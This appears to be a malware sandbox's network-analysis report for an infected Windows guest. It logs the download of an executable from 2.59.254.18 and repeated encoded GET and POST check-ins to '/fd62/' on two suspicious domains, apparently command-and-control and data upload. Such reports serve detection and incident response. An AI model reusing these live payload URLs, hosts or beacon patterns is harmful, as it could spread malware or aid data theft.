Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.ag6622.com | ||
www.soc34m.com |
CNAME
soc34m.com
|
34.102.136.180 |
www.sdxgwnkf.cfd | 38.53.14.81 |
- TCP Requests
-
-
192.168.56.103:49163 2.59.254.18:80
-
192.168.56.103:49173 34.102.136.180:80www.soc34m.com
-
192.168.56.103:49174 34.102.136.180:80www.soc34m.com
-
192.168.56.103:49175 34.102.136.180:80www.soc34m.com
-
192.168.56.103:49170 38.53.14.81:80www.sdxgwnkf.cfd
-
192.168.56.103:49171 38.53.14.81:80www.sdxgwnkf.cfd
-
192.168.56.103:49172 38.53.14.81:80www.sdxgwnkf.cfd
-
94.156.6.225:4040 192.168.56.103:49169
-
- UDP Requests
-
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.101:137
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:138 192.168.56.255:138
-
192.168.56.103:49155 239.255.255.250:1900
-
8.8.8.8:53 192.168.56.103:50800
-
8.8.8.8:53 192.168.56.103:52760
-
8.8.8.8:53 192.168.56.103:53673
-
8.8.8.8:53 192.168.56.103:62576
-
8.8.8.8:53 192.168.56.103:64894
-
GET
200
http://2.59.254.18/_errorpages/defounderzx.exe
REQUEST
RESPONSE
BODY
GET /_errorpages/defounderzx.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 2.59.254.18
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 04 Aug 2023 00:08:26 GMT
Server: Apache
Last-Modified: Tue, 01 Aug 2023 15:49:52 GMT
ETag: "97000-601de7f74cd61"
Accept-Ranges: bytes
Content-Length: 618496
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
GET
200
http://www.sdxgwnkf.cfd/fd62/?JjUdE2=ghnUtiMEyEw2O5h1P7vo9Byhe/usWh543+65PpmWc9PRh4YewV0BtpdKaxjHtlCT/jMo+a/V&t8o=FrFL&sql=1
REQUEST
RESPONSE
BODY
GET /fd62/?JjUdE2=ghnUtiMEyEw2O5h1P7vo9Byhe/usWh543+65PpmWc9PRh4YewV0BtpdKaxjHtlCT/jMo+a/V&t8o=FrFL&sql=1 HTTP/1.1
Host: www.sdxgwnkf.cfd
Connection: close
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 04 Aug 2023 00:10:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
POST
0
http://www.sdxgwnkf.cfd/fd62/
REQUEST
RESPONSE
BODY
POST /fd62/ HTTP/1.1
Host: www.sdxgwnkf.cfd
Connection: close
Content-Length: 3416
Cache-Control: no-cache
Origin: http://www.sdxgwnkf.cfd
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.sdxgwnkf.cfd/fd62/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
POST
0
http://www.sdxgwnkf.cfd/fd62/
REQUEST
RESPONSE
BODY
POST /fd62/ HTTP/1.1
Host: www.sdxgwnkf.cfd
Connection: close
Content-Length: 267004
Cache-Control: no-cache
Origin: http://www.sdxgwnkf.cfd
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.sdxgwnkf.cfd/fd62/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
GET
403
http://www.soc34m.com/fd62/?JjUdE2=xn0HKfGIZzHBtebtM2PJoTiRmP7tmvS0K83HwlewIFGHtZl2UfwiPMnZWATjhy2Ku2mJdV27&t8o=FrFL&sql=1
REQUEST
RESPONSE
BODY
GET /fd62/?JjUdE2=xn0HKfGIZzHBtebtM2PJoTiRmP7tmvS0K83HwlewIFGHtZl2UfwiPMnZWATjhy2Ku2mJdV27&t8o=FrFL&sql=1 HTTP/1.1
Host: www.soc34m.com
Connection: close
HTTP/1.1 403 Forbidden
Server: openresty
Date: Fri, 04 Aug 2023 00:10:21 GMT
Content-Type: text/html
Content-Length: 291
ETag: "64cc3fd9-123"
Via: 1.1 google
Connection: close
POST
0
http://www.soc34m.com/fd62/
REQUEST
RESPONSE
BODY
POST /fd62/ HTTP/1.1
Host: www.soc34m.com
Connection: close
Content-Length: 3416
Cache-Control: no-cache
Origin: http://www.soc34m.com
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.soc34m.com/fd62/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
POST
0
http://www.soc34m.com/fd62/
REQUEST
RESPONSE
BODY
POST /fd62/ HTTP/1.1
Host: www.soc34m.com
Connection: close
Content-Length: 267004
Cache-Control: no-cache
Origin: http://www.soc34m.com
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.soc34m.com/fd62/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.103 | 164.124.101.2 | 3 | |
192.168.56.103 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts